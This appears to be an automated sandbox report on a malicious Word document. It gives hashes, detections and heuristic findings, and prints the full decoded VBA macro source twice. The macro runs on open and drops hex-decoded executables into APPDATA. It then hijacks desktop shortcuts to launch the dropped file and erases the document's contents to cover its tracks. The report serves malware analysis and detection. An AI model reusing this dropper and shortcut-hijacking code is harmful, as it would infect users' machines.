Office (OLE) malware analysis — malicious · a4276750a825c73f

MALICIOUS

Office (OLE)

386.5 KB Created: 2018-11-29 10:45:00 Authoring application: Microsoft Office Word First seen: 2019-01-12

MD5: 9aff54da8d88f6794ce900fd3bf2ad62 SHA-1: f403fa334c8804020b9a2f1620ca6a251c34827c SHA-256: a4276750a825c73f465bf67672b06f19613db82c047f9c0daa7c971c1d231fac

418 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample contains a critical OLE_VBA_SHELL heuristic indicating the use of the Shell() function, and critical OLE_VBA_WSCRIPT indicating WScript.Shell usage. The Document_Open macro attempts to create a directory '%APPDATA%\lkn', writes content from UserForm1.TextBox1 and UserForm2.TextBox1 to 'werd.exe' and 'wird.exe' respectively, and then attempts to copy and execute files. This behavior strongly suggests a dropper functionality designed to download and execute a second-stage payload.

Heuristics 12

ClamAV: Doc.Dropper.Agent-6835537-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6835537-0
VBA macros detected medium 8 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
   Dim shell As Shell32.shell
    Dim folder As Shell32.folder
```

WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage

Matched line in script

Dim oWsh
Set oWsh = CreateObject("WScript.Shell")
strDirPath = oWsh.SpecialFolders("Desktop")

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

Dim oWsh
Set oWsh = CreateObject("WScript.Shell")
strDirPath = oWsh.SpecialFolders("Desktop")

GetObject call high OLE_VBA_GETOBJ

GetObject call

Matched line in script

Function ClipboardText()
    With GetObject("New:{1C3B4210-F441-11CE-B9EA-00AA006B1A69}")
        .GetFromClipboard

VBA instantiates a COM class by raw CLSID high OLE_VBA_GETOBJECT_CLSID_EVASION

VBA uses GetObject("new:{CLSID}") to instantiate a COM class by raw CLSID rather than a CreateObject ProgID — an uncommon bypass of name-based macro detection.
Matched line in script
```
Function ClipboardText()
    With GetObject("New:{1C3B4210-F441-11CE-B9EA-00AA006B1A69}")
        .GetFromClipboard
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Option Explicit
Private Sub Document_Open()
On Error Resume Next
```
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
gdffs = Environ("APPDATA") & "\"
```
Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5152 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5152 bytes
SHA-256: `bb3525f99b42e412867b4d7e4427539c32a20765e1c36aff3db9ac1ebacdaede`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Option Explicit Private Sub Document_Open() On Error Resume Next Dim gdffs gdffs = Environ("APPDATA") & "\" If Dir(gdffs & "lkn", vbDirectory) = "" Then Open gdffs & "werd.exe" For Output As #1 Print #1, HexToString(UserForm1.TextBox1.text) Close #1 Open gdffs & "wird.exe" For Output As #1 Print #1, HexToString(UserForm2.TextBox1.text) Close #1 Call finds Else End If End Sub Sub finds() On Error Resume Next Dim strDirPath, strMaskSearch, strFileName As String Dim oWsh Set oWsh = CreateObject("WScript.Shell") strDirPath = oWsh.SpecialFolders("Desktop") strMaskSearch = ".lnk" Dim s As String, s2 As String s = Environ("APPDATA") & "\lkn" MkDir s Dim fso As Object Set fso = VBA.CreateObject("Scripting.FileSystemObject") Dim gdffs, iStr1 gdffs = Environ("APPDATA") iStr1 = Left(gdffs, 3) & "users\public\desktop" strFileName = Dir(iStr1 & "/" & strMaskSearch) Do While strFileName <> "" FileCopy iStr1 & "\" & strFileName, s & "\" & strFileName Kill iStr1 & "\" & strFileName FileCopy s & "\" & strFileName, strDirPath & "\" & strFileName strFileName = Dir Loop strFileName = Dir(strDirPath & "/" & strMaskSearch) Do While strFileName <> "" FileCopy oWsh.SpecialFolders("Desktop") & "\" & strFileName, s & "\" & strFileName Call MakeShortcut(strFileName, strFileName, s & "\" & strFileName, oWsh.SpecialFolders("Desktop")) ' MsgBox strFileName strFileName = Dir Loop Selection.WholeStory Selection.Copy Selection.TypeBackspace ActiveDocument.Save ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatXMLDocument Application.Quit End Sub Sub MakeShortcut(pod, gfdgd, jojj, hhhhh) Dim a, b, c, f, pos, pis, pas, pus, ppp, txt Selection.InsertFile FileName:=jojj, Range:="", _ ConfirmConversions:=False, Link:=False, Attachment:=False Selection.WholeStory Selection.Copy Selection.TypeBackspace txt = ClipboardText Dim sss, aaa, aaaa, ssss, aa, aas, aad ssss = InStr(1, txt, ":\") aaaa = InStr(ssss + 5, txt, ":\") aa = Mid(txt, aaaa - 1) aas = Left(aa, 100) sss = InStr(1, aas, ".exe") aad = Left(aa, sss + 3) Dim kkk, xxx, ccc, vvv, bbb, nnn kkk = InStr(sss - 20, aad, "\") xxx = InStr(kkk + 1, aad, "\") If xxx <> 0 Then ccc = Mid(aad, xxx + 1) Else ccc = Mid(aad, kkk + 1) End If Dim oWsh Dim myshortcut Dim oShortcut Dim strSplitFileName Dim strTarget Dim nShortName, strDirPath Set oWsh = CreateObject("WScript.Shell") strDirPath = oWsh.SpecialFolders("Desktop") Dim fsdf As String fsdf = Environ("APPDATA") & "\wird.exe" Dim shell As Shell32.shell Dim folder As Shell32.folder Dim folderItem As Shell32.folderItem Dim shortcut As Shell32.ShellLinkObject Set shell = New Shell32.shell Set folder = shell.NameSpace(strDirPath) If Not folder Is Nothing Then Set folderItem = folder.ParseName(pod) If Not folderItem Is Nothing Then Set shortcut = folderItem.GetLink If Not shortcut Is Nothing Then shortcut.Path = fsdf shortcut.Arguments = """" & ccc & """" & " " & """" & jojj & """" shortcut.SetIconLocation aad, 0 shortcut.Save End If End If End If Set oWsh = Nothing Set oShortcut = Nothing End Sub Function ClipboardText() With GetObject("New:{1C3B4210-F441-11CE-B9EA-00AA006B1A69}") .GetFromClipboard ClipboardText = .GetText End With End Function Public Function HexToString(ByVal HexToStr As String) As String Dim strTemp As String Dim strReturn As String Dim i As Long For i = 1 To Len(HexToStr) Step 2 strTemp = Chr$(Val("&H" & Mid$(HexToStr, i, 2))) strReturn = strReturn & strTemp Next i HexToString = Right(strReturn, Len(strReturn)) End Function Attribute VB_Name = "UserForm1" Attribute VB_Base = "0{D4012650-63C5-41D6-8B42-E7B39DC07E9F}{237B9DEB-AFBC-460D-9108-01D0545B5156}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub TextBox1_Change() End Sub Attribute VB_Name = "UserForm2" Attribute VB_Base = "0{096E98AB-906D-43A3-8701-596010F89713}{C721879D-BB87-4E9E-80BF-C5773C6DAD97}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False

SHA-256: bb3525f99b42e412867b4d7e4427539c32a20765e1c36aff3db9ac1ebacdaede

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Private Sub Document_Open()
On Error Resume Next
Dim gdffs

gdffs = Environ("APPDATA") & "\"

 If Dir(gdffs & "lkn", vbDirectory) = "" Then
                Open gdffs & "werd.exe" For Output As #1
    Print #1, HexToString(UserForm1.TextBox1.text)
    Close #1
    
          Open gdffs & "wird.exe" For Output As #1
    Print #1, HexToString(UserForm2.TextBox1.text)
       Close #1
    Call finds
    Else

    End If
    
   
   End Sub


Sub finds()
On Error Resume Next
Dim strDirPath, strMaskSearch, strFileName As String
Dim oWsh
Set oWsh = CreateObject("WScript.Shell")
strDirPath = oWsh.SpecialFolders("Desktop")
strMaskSearch = "*.lnk*"


Dim s As String, s2 As String

    s = Environ("APPDATA") & "\lkn"

      MkDir s

Dim fso As Object
Set fso = VBA.CreateObject("Scripting.FileSystemObject")




Dim gdffs, iStr1

gdffs = Environ("APPDATA")
 iStr1 = Left(gdffs, 3) & "users\public\desktop"
strFileName = Dir(iStr1 & "/" & strMaskSearch)

Do While strFileName <> ""


FileCopy iStr1 & "\" & strFileName, s & "\" & strFileName
     Kill iStr1 & "\" & strFileName
FileCopy s & "\" & strFileName, strDirPath & "\" & strFileName

    strFileName = Dir
Loop






strFileName = Dir(strDirPath & "/" & strMaskSearch)

Do While strFileName <> ""


FileCopy oWsh.SpecialFolders("Desktop") & "\" & strFileName, s & "\" & strFileName
Call MakeShortcut(strFileName, strFileName, s & "\" & strFileName, oWsh.SpecialFolders("Desktop"))
  ' MsgBox strFileName

    strFileName = Dir
Loop
    Selection.WholeStory
    Selection.Copy
  Selection.TypeBackspace
  ActiveDocument.Save
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatXMLDocument
Application.Quit
End Sub

Sub MakeShortcut(pod, gfdgd, jojj, hhhhh)
Dim a, b, c, f, pos, pis, pas, pus, ppp, txt

Selection.InsertFile FileName:=jojj, Range:="", _
        ConfirmConversions:=False, Link:=False, Attachment:=False

    Selection.WholeStory
    Selection.Copy
  Selection.TypeBackspace
    txt = ClipboardText


   Dim sss, aaa, aaaa, ssss, aa, aas, aad
    
    ssss = InStr(1, txt, ":\")
    aaaa = InStr(ssss + 5, txt, ":\")
    aa = Mid(txt, aaaa - 1)
    aas = Left(aa, 100)
    sss = InStr(1, aas, ".exe")
    aad = Left(aa, sss + 3)


Dim kkk, xxx, ccc, vvv, bbb, nnn

kkk = InStr(sss - 20, aad, "\")

xxx = InStr(kkk + 1, aad, "\")


If xxx <> 0 Then
ccc = Mid(aad, xxx + 1)

Else
ccc = Mid(aad, kkk + 1)

End If

Dim oWsh
Dim myshortcut
Dim oShortcut
Dim strSplitFileName
Dim strTarget
Dim nShortName, strDirPath

Set oWsh = CreateObject("WScript.Shell")

strDirPath = oWsh.SpecialFolders("Desktop")


     Dim fsdf As String
     fsdf = Environ("APPDATA") & "\wird.exe"




   Dim shell As Shell32.shell
    Dim folder As Shell32.folder
    Dim folderItem As Shell32.folderItem
    Dim shortcut As Shell32.ShellLinkObject
    
    Set shell = New Shell32.shell
    
    Set folder = shell.NameSpace(strDirPath)
    If Not folder Is Nothing Then
        Set folderItem = folder.ParseName(pod)
        If Not folderItem Is Nothing Then
            Set shortcut = folderItem.GetLink
            If Not shortcut Is Nothing Then
                shortcut.Path = fsdf
        
 

   shortcut.Arguments = """" & ccc & """" & " " & """" & jojj & """"
                shortcut.SetIconLocation aad, 0
                 shortcut.Save
            End If
        End If
    End If
    
    
    

Set oWsh = Nothing
Set oShortcut = Nothing




End Sub

Function ClipboardText()
    With GetObject("New:{1C3B4210-F441-11CE-B9EA-00AA006B1A69}")
        .GetFromClipboard
        ClipboardText = .GetText
    End With
End Function


Public Function HexToString(ByVal HexToStr As String) As String

Dim strTemp   As String
Dim strReturn As String
Dim i As Long

For i = 1 To Len(HexToStr) Step 2
    strTemp = Chr$(Val("&H" & Mid$(HexToStr, i, 2)))
    strReturn = strReturn & strTemp
Next i
HexToString = Right(strReturn, Len(strReturn))
End Function

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{D4012650-63C5-41D6-8B42-E7B39DC07E9F}{237B9DEB-AFBC-460D-9108-01D0545B5156}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub TextBox1_Change()

End Sub

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{096E98AB-906D-43A3-8701-596010F89713}{C721879D-BB87-4E9E-80BF-C5773C6DAD97}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.